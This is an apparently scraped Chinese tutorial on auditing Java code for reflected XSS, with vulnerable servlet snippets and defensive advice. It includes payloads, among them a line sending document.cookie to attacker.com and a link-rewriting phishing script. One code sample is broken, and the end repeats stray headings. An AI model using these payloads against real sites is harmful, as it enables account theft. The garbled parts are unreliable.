Java代码审计：反射型跨站脚本(XSS)漏洞详解<\/h1>

一、XSS基础概念<\/h2>

1. 原理<\/h3>
跨站脚本(XSS)攻击是指恶意攻击者往Web页面里插入恶意JavaScript代码，当服务端没有对数据进行严格过滤时，这些代码会被浏览器当作正常的HTML\/JS代码解析执行。<\/p>

2. 危害<\/h3>

流量劫持<\/li>
获取用户Cookie信息，盗取账号<\/li>
篡改、删除页面信息(钓鱼)<\/li>
配合CSRF攻击实施进一步攻击<\/li>

可能导致远程代码执行(XSS2RCE)<\/li> <\/ul>

3. XSS分类<\/h3>

存储型XSS<\/strong>：持久性攻击，恶意代码存入数据库、session或文件<\/p>

常见位置：用户留言、评论、用户昵称、用户信息等<\/li> <\/ul> <\/li>

反射型XSS<\/strong>：非持久性攻击，不会存入数据库<\/p>

常见位置：用户登录、搜索框、订单等<\/li> <\/ul> <\/li>

DOM型XSS<\/strong>：特殊的跨站，通过JS和DOM技术输出到HTML中<\/p> <\/li> <\/ol>
二、XSS攻击Payload示例<\/h2>
1. 基本Payload<\/h3>
alert<\/span>(123<\/span>) <\/span><\/span>confirm<\/span>(123<\/span>) <\/span><\/span>prompt<\/span>(123<\/span>) <\/span><\/span><\/code><\/pre>2. 标签Payload<\/h3> <script<\/span>>alert<\/span>(1<\/span>)<\/script<\/span>> <\/span><\/span> <\/span><\/span> <\/span><\/span><a<\/span> href<\/span>=<\/span>"javascript:alert(1)"<\/span>>click<\/a<\/span>> <\/span><\/span><\/code><\/pre>3. 实际攻击利用<\/h3> 盗取Cookie<\/strong>：<\/p> window.location<\/span>.href<\/span>=<\/span>'http:\/\/attacker.com\/getCookie.php?cookie='<\/span> +<\/span> document.cookie<\/span> <\/span><\/span><\/code><\/pre>钓鱼攻击<\/strong>：<\/p> document.getElementsByTagName<\/span>("body"<\/span>)[0<\/span>].onload<\/span>=<\/span>function<\/span> chageLink<\/span>(){ <\/span><\/span> document.getElementsByTagName<\/span>("a"<\/span>)[1<\/span>].href<\/span>=<\/span>"http:\/\/attacker.com\/rePasswd.php"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>三、反射型XSS代码审计<\/h2> 1. 常见获取前端数据的方式<\/h3> (1) 使用Servlet技术<\/h4> public<\/span> static<\/span> void<\/span> test2<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> String try02 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"try02"<\/span>);<\/span> \/\/ 获取前端参数 <\/span><\/span><\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>(2) 使用Struts2框架<\/h4> 通过Action类绑定参数或model参数<\/li> 通过Action属性接受参数<\/li> <\/ul> (3) 使用SpringMVC获取前端参数<\/h4> 2. 漏洞代码示例<\/h3> 示例1：未进行任何过滤<\/h4> public<\/span> static<\/span> void<\/span> test1<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> String try01 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"try01"<\/span>);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"try01="<\/span>+<\/span>try01);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>攻击请求<\/strong>：<\/p> index.jsp?responseTry01=<script>alert(123)<\/script> <\/code><\/pre> 示例2：基于黑名单的简单过滤<\/h4> public<\/span> static<\/span> void<\/span> test2<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> String try02 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"try02"<\/span>);<\/span> <\/span><\/span> if<\/span>(<\/span>try02 !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> if<\/span>(<\/span>try02.<\/span>contains<\/span>(<\/span>"<script>"<\/span>))<\/span> {<\/span> <\/span><\/span> try02 =<\/span> "this program(02) is malice"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>示例3：黑名单过滤并处理大小写<\/h4> public<\/span> static<\/span> void<\/span> test3<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> String try03 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"try03"<\/span>);<\/span> <\/span><\/span> if<\/span>(<\/span>try03 !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> if<\/span>(<\/span>try03.<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"<script>"<\/span>))<\/span> {<\/span> <\/span><\/span> try03 =<\/span> "this program(03) is malice"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>示例4：非法字符转义<\/h4> public<\/span> static<\/span> void<\/span> test4<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> String try04 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"try04"<\/span>);<\/span> <\/span><\/span> if<\/span>(<\/span>try04 !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> try04 =<\/span> ESAPI.<\/span>encoder<\/span>().<\/span>encodeForHTML<\/span>(<\/span>try04);<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>示例5：黑名单数据替换<\/h4> public<\/span> static<\/span> void<\/span> test5<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> String try05 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"try05"<\/span>);<\/span> <\/span><\/span> if<\/span>(<\/span>try05 !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> String payload1 =<\/span> "<\/script>"<\/span>;<\/span> <\/span><\/span> String payload2 =<\/span> "<script>"<\/span>;<\/span> <\/span><\/span> String payload3 =<\/span> " payloads = new ArrayList<>(); <\/span><\/span><\/span> payloads.add(payload1); <\/span><\/span><\/span> payloads.add(payload2); <\/span><\/span><\/span> payloads.add(payload3); <\/span><\/span><\/span> <\/span><\/span><\/span> for (int i = 0; i < payloads.size(); i++) { <\/span><\/span><\/span> if (try05.contains(payloads.get(i))){ <\/span><\/span><\/span> try05 = try05.replaceAll(payloads.get(i),"<\/span>"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>四、XSS防御措施<\/h2> 1. 过滤策略<\/h3> 黑名单过滤<\/strong>：过滤已知危险字符和标签<\/li> 白名单过滤<\/strong>：只允许已知安全的字符和标签<\/li> 大小写处理<\/strong>：统一转换为小写\/大写后再过滤<\/li> 多重过滤<\/strong>：组合多种过滤方式<\/li> <\/ul> 2. 编码策略<\/h3> HTML实体编码<\/strong>：将特殊字符转换为HTML实体<\/li> URL编码<\/strong>：对URL中的参数进行编码<\/li> JavaScript编码<\/strong>：对JS代码中的特殊字符进行编码<\/li> <\/ul> 3. 其他防御措施<\/h3> 内容安全策略(CSP)<\/strong>：限制页面可以加载的资源<\/li> HttpOnly标志<\/strong>：防止JavaScript访问Cookie<\/li> 输入验证<\/strong>：对用户输入进行严格验证<\/li> 输出编码<\/strong>：根据输出上下文进行适当的编码<\/li> <\/ul> 五、审计要点<\/h2> 寻找输入点<\/strong>：识别所有从HTTP请求获取参数的地方<\/li> 追踪数据流<\/strong>：分析参数如何在系统中流动<\/li> 检查输出点<\/strong>：确定参数最终如何输出到页面<\/li> 验证过滤<\/strong>：检查是否有足够的过滤和编码措施<\/li> 测试绕过<\/strong>：尝试各种Payload测试过滤是否可绕过<\/li> <\/ol> 六、总结<\/h2> 反射型XSS漏洞审计的关键在于：<\/p> 识别所有从外部获取数据的入口点<\/li> 分析数据如何在系统中处理和传递<\/li> 检查数据输出时是否进行了适当的编码或过滤<\/li> 测试各种Payload验证防御措施的有效性<\/li> <\/ol> 有效的防御需要结合多种技术，包括但不限于输入验证、输出编码、内容安全策略等，不能仅依赖单一防护措施。<\/p>

Java代码审计：反射型跨站脚本(XSS)漏洞详解<\/h1>

一、XSS基础概念<\/h2>

1. 原理<\/h3> 跨站脚本(XSS)攻击是指恶意攻击者往Web页面里插入恶意JavaScript代码，当服务端没有对数据进行严格过滤时，这些代码会被浏览器当作正常的HTML\/JS代码解析执行。<\/p>

三、反射型XSS代码审计<\/h2>

1. 常见获取前端数据的方式<\/h3>

(3) 使用SpringMVC获取前端参数<\/h4>

2. 漏洞代码示例<\/h3>

四、XSS防御措施<\/h2>

1. 原理<\/h3>
跨站脚本(XSS)攻击是指恶意攻击者往Web页面里插入恶意JavaScript代码，当服务端没有对数据进行严格过滤时，这些代码会被浏览器当作正常的HTML\/JS代码解析执行。<\/p>